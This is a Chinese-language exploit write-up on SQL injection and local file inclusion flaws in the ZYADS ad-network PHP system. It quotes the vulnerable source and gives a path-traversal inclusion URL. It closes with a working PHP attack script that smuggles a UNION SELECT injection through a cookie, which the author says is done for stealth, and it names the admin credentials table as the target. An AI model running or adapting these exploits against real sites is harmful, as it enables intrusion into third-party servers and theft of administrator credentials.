中易广告联盟系统(ZYADS) sql注入和本地包含漏洞 's

作者：q1ur3n

在index/news.php 1-31行

<? include_once("top.php");        $newsid = intval($_GET['id']);        $to_type = addslashes($_GET['type']);        if ($to_type=='index')       {           $to_type_s =" and to_type=1";       }         if ($to_type=='webuser')       {           $to_type_s =" and to_type!=3";       }         if ($to_type=='webadver')       {           $to_type_s =" and to_type!=2";       }        $newssql = 'select * from zyads_news WHERE `id` =/'' . $newsid . '/'   '.$to_type_s.'';        $newsre=$db->query($newssql);       $newsrow = $db->fetch_array($newsre);       if (empty($newsrow)){          zyads_message('zyads_news');       } ?>

可以看到$to_type没定义或者不等于index，webuser，webadver的话 那么$to_type_s是没有定义的

这时候我们就可以提交一个$to_type_s变量来进行sql注入。简单的注入，呵呵。

在/code/adview_cpa_html.php 1-46行

<?php /*********************/ /*                   */ /*  Version : 5.1.0  */ /*  Author  : RM     */ /*  Comment : 071223 */ /*                   */ /*********************/  _obfuscate_JQYdYn1jfBI( ); define( "IN_ZYADS", TRUE ); $name = $_GET['name']; $adid = $_GET['adid']; $offsetwidth = $_GET['offsetwidth']; $site = $_GET['site']; $click_url = "http://www.erzhi.cn"; $count_url = "http://www.erzhi.cn"; if ( empty( $name ) || empty( $adid ) || empty( $site ) ) {         exit( "广告出错" ); } @require( "../user/c/".$name."/user_info.php" ); require( "../include/soft_class.php" ); require( "../include/settings.php" ); $code = new _obfuscate_Y2xpZW50( ); $getip = $code->_obfuscate_Z2V0aXA( ); $getbrowse = $code->_obfuscate_Z2V0YnJvd3Nl( ); $getos = $code->_obfuscate_Z2V0b3M( ); $maketime = time( ) + $setting['zyads_date'] * 3600; $maketime = $maketime; $strbas = $code->_obfuscate_cGFzc3BvcnRfZW5jcnlwdA(   $getip."|".$maketime."|".$getbrowse."|".$getos, $setting['url_pwd'] ); $strbas = _obfuscate_IGI7aGd_LDRuMD0VZg( $strbas ); if ( $zyads_users['flag'] != 2 ) {         echo "document.write('帐号被锁定');";         exit( ); } if ( _obfuscate_Cx96BhhwZxABPA8( "../cache/cpa/".$adid.".php" ) ) {         require( "../cache/cpa/".$adid.".php" ); } else {         exit( "文件丢失-".$adid.".php" ); }

$name，$adid这两个变量都能造成本地包含漏洞

不过$adid好利用点。

exp：/code/adview_cpa_html.php?name=admin&adid=../../index&site=www.xxx.com

最后附上一个exp，只是简单的cookie提交参数  为了隐蔽点 呵呵

<?php //by q1ur3n //team: http://www.wolvez.org //exp : zyads.php?site=www.tx8688.com&id=and 1=2 union select 1,2,3,4,5,6%23 //敏感信息表信息： /* DROP TABLE IF EXISTS zyads_admin; CREATE TABLE zyads_admin (    id int(11) NOT NULL auto_increment,    username varchar(20) NOT NULL,    pwd varchar(50) NOT NULL,    login_num int(11) NOT NULL,    last_time datetime DEFAULT '0000-00-00 00:00:00' NOT NULL,    islock int(1) NOT NULL,    ip varchar(20) NOT NULL,    admin_flag varchar(200) NOT NULL,    addtime datetime NOT NULL,    PRIMARY KEY (id) );  */  $host = $_GET['site']; $cmd='to_type_s='.urlencode(stripcslashes($_REQUEST["id"]));  $message = "GET /index/news.php?id=89  HTTP/1.1/r/n"; $message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-  shockwave-flash, */*/r/n"; $message .= "Referer: http://www.baidu.com//r/n"; $message .= "Accept-Language: zh-cn/r/n"; $message .= "Content-Type: application/x-www-form-urlencoded/r/n"; $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)/r/n"; $message .= "Host: $host/r/n"; $message .= "Connection: Close/r/n"; $message .= "Cookie: ".$cmd."/r/n/r/n"; //echo $message;  $fp = fsockopen($host, 80); fputs($fp, $message); $resp = ''; while ($fp && !feof($fp)) $resp .= fread($fp, 1024); echo $resp; fclose($fp);  ?>